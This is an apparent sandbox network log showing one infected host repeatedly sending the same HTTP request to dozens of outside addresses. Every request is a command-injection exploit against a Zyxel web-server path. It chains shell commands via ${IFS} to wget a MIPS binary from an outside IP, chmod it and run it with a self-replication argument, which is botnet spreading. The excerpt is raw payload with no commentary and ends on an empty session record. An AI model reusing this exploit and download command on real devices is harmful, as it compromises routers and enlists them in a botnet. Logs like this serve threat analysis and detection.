                                    Jan 13, 2024 19:02:39.308816910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5810192.168.2.1343088196.197.19.123443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.308844090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5811192.168.2.1337678206.43.61.11443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.308886051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5812192.168.2.135983892.82.192.171443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.308944941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5813192.168.2.1353754166.135.228.237443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.308983088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5814192.168.2.1339846169.160.150.80443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.309037924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5815192.168.2.1345088154.124.195.63443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.309088945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5816192.168.2.1340400184.36.85.115443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.309115887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5817192.168.2.1339396191.143.88.38443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.309160948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5818192.168.2.135044289.229.86.181443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.309211016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5819192.168.2.133835035.232.17.129443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.309289932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5820192.168.2.1339440101.200.247.74443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.309313059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5821192.168.2.134590839.173.231.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.309345007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5822192.168.2.135977480.123.241.230443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.309387922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5823192.168.2.1348706121.62.89.76443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.309462070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5824192.168.2.1344894104.46.113.139443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.309505939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5825192.168.2.1343102189.226.6.85443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.309556007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5826192.168.2.136029613.3.221.1443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.309597015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5827192.168.2.134876095.113.162.51443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.309653997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5828192.168.2.1339942164.92.72.154443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.309705973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5829192.168.2.1347772103.30.50.52443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:39.309731007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5830192.168.2.1355102141.184.145.100443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.315646887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5831192.168.2.1351686108.126.14.238443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.315768957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5832192.168.2.134289044.169.74.138443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.315895081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5833192.168.2.1348716151.247.119.115443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.315934896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5834192.168.2.135984069.141.38.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.315987110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5835192.168.2.1338022171.181.44.249443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.316054106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5836192.168.2.133600281.250.202.79443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.316092968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5837192.168.2.134968042.57.76.254443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.316143036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5838192.168.2.1353394152.223.190.103443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.316184998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5839192.168.2.134976841.75.6.171443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.316232920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5840192.168.2.135948461.140.242.158443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.316287994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5841192.168.2.1350350209.40.107.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.316325903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5842192.168.2.1359640153.127.121.173443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.316395044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5843192.168.2.1336522206.187.86.20443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.316442966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5844192.168.2.1355232111.22.190.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.316530943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5845192.168.2.1348620129.108.61.92443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.316557884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5846192.168.2.135488270.214.217.74443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.316591978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5847192.168.2.135393245.51.101.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.316625118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5848192.168.2.1356320142.7.215.242443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.316704988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5849192.168.2.135760241.90.181.57443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.316761017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5850192.168.2.134281686.11.138.12443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.316792965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5851192.168.2.135814835.250.47.241443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.316848993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5852192.168.2.135563269.204.55.226443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.316910982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5853192.168.2.1347032140.47.199.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.316956043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5854192.168.2.1355950113.226.149.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.317009926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5855192.168.2.133347847.63.245.71443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.317059040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5856192.168.2.1341554106.101.37.80443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.317131996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5857192.168.2.1354926148.216.134.165443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.317161083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5858192.168.2.1337480102.98.131.163443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.317186117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5859192.168.2.134622669.249.112.226443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.317248106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5860192.168.2.134452618.133.207.248443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.317300081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5861192.168.2.135809271.37.206.255443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.317358971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5862192.168.2.134142095.130.187.184443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.317415953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5863192.168.2.1348136198.169.90.44443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.317456007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5864192.168.2.134793232.140.102.2443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.317537069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5865192.168.2.1353020199.101.136.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.317601919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5866192.168.2.133567679.163.38.101443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.317656040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5867192.168.2.1336044180.75.55.29443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.317713976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5868192.168.2.135239469.90.132.26443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.317774057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5869192.168.2.1358066102.11.192.190443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.317826033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5870192.168.2.1353764180.110.187.225443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.317903042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5871192.168.2.134163290.64.213.115443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:40.317939997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5872192.168.2.1353364115.12.215.174443
                                    TimestampBytes transferredDirectionData
